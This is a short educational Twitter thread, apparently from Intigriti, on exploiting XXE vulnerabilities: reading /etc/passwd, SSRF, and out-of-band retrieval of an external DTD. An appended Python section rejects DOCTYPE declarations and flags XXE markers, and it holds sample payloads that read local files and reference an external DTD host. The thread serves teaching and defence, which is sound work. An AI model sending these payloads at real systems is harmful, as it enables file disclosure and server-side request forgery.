INTIGRITI
Aug 11, 9 tweets, 3 min read
XXE exploitation 👇️ [image]
Today, we will cover how you can successfully exploit XXE vulnerabilities

If you aren't familiar with the concepts of XXE yet...

This thread is made just for you! 👇️
1⃣ Basic exploitation via XML Entities

Let's start off with the most basic example

A web app that queries the backend to retrieve your previously sent messages [image]
To test whether this feature is vulnerable to XXE, we could try to retrieve a local file

To do so, we'd have to add the XML entity definition ourselves: [image]
Afterwards, include your entity in the field and send the request

The response should contain the contents of the local file "/etc/passwd" [image]
But we can also take the same approach to request an internal or external resource and escalate this into an SSRF vulnerability! [image]
2⃣ Exploitation via OOB technique

This exploitation technique involves us hosting a DTD file and referencing it in our payload

The XML parser will then parse our malicious XML data and retrieve the external DTD
That DTD file contains our payload

And just as before, we can send our request and retrieve the contents of a local file, for example!
[image]
[image]
We hope you've learned something new from this thread on XXE exploitation.
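As an added, defensive example (not code from the Intigriti thread), here is the check a backend should run before an XML body ever reaches the parser: both shapes above, the inline entity definition and the DOCTYPE that pulls an external DTD, can only appear inside a DOCTYPE declaration, so refusing any body that carries one closes both routes. The classifier alongside it tags which shape a request body shows so a detection rule can log it. The sample bodies and the dtd-host.invalid hostname are constructed for the example.

```python
"""Added example, not from the Intigriti thread: reject DTDs before parsing,
and tag request bodies that carry the XXE shapes the thread describes."""
import re
import xml.etree.ElementTree as ET


class UnsafeXmlError(ValueError):
    """Raised when a body carries a DOCTYPE; a message API never needs one."""


# Markers checked in this fixed order. Matching is deliberately loose
# (case-insensitive, no XML tokenising): a false positive only means an
# extra alert, while the parse guard below keys off "doctype" alone.
_CHECKS = (
    ("doctype", re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)),
    ("entity-decl", re.compile(rb"<!ENTITY\b", re.IGNORECASE)),
    ("parameter-entity", re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)),
    ("external-ref", re.compile(rb'''\b(?:SYSTEM|PUBLIC)\s+["']''', re.IGNORECASE)),
)


def classify(body: bytes) -> list[str]:
    """Return the names of every marker present in the raw body."""
    return [name for name, rx in _CHECKS if rx.search(body)]


def parse_untrusted(body: bytes) -> ET.Element:
    """Parse XML from a client, refusing anything that declares a DTD.

    Entities (inline or via an external DTD) can only be declared inside a
    DOCTYPE, so rejecting the DOCTYPE up front stops file reads, SSRF and
    out-of-band DTD retrieval regardless of how the parser is configured.
    """
    if _CHECKS[0][1].search(body):
        raise UnsafeXmlError("DOCTYPE declarations are not accepted")
    return ET.fromstring(body)


def is_rejected(body: bytes) -> bool:
    """True when parse_untrusted refuses the body."""
    try:
        parse_untrusted(body)
    except UnsafeXmlError:
        return True
    return False


def flag_requests(bodies: list[bytes]) -> list[tuple[int, list[str]]]:
    """Detection pass over captured request bodies: (index, findings)."""
    return [(i, f) for i, b in enumerate(bodies) if (f := classify(b))]


# Constructed sample bodies for the "retrieve my messages" endpoint.
BENIGN = b'<?xml version="1.0"?><messages><message>hello</message></messages>'
INLINE_ENTITY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE messages [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<messages><message>&xxe;</message></messages>'
)
EXTERNAL_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE messages SYSTEM "http://dtd-host.invalid/ext.dtd">'
    b'<messages><message>hi</message></messages>'
)
PARAM_ENTITY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE messages [<!ENTITY % ext SYSTEM "http://dtd-host.invalid/ext.dtd"> %ext;]>'
    b'<messages/>'
)

if __name__ == "__main__":
    for idx, findings in flag_requests([BENIGN, INLINE_ENTITY, EXTERNAL_DTD, PARAM_ENTITY]):
        print(f"body {idx}: {', '.join(findings)}")
    print("benign parses:", parse_untrusted(BENIGN).find("message").text)
```

The guard is a whitelist decision, not a payload signature: it does not try to recognise a particular entity or URL scheme, it simply refuses the one construct that makes entity expansion possible. Where an application genuinely needs DTDs, the equivalent is to configure the parser to disallow external entity resolution and limit expansion, but for an endpoint like the one in the thread the DOCTYPE rejection is the simplest fix to review.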

If you have enjoyed this thread:
1. Follow us @INTIGRITI for more of these threads 🐛️
2. Retweet the first Tweet to share it with your friends 💙️
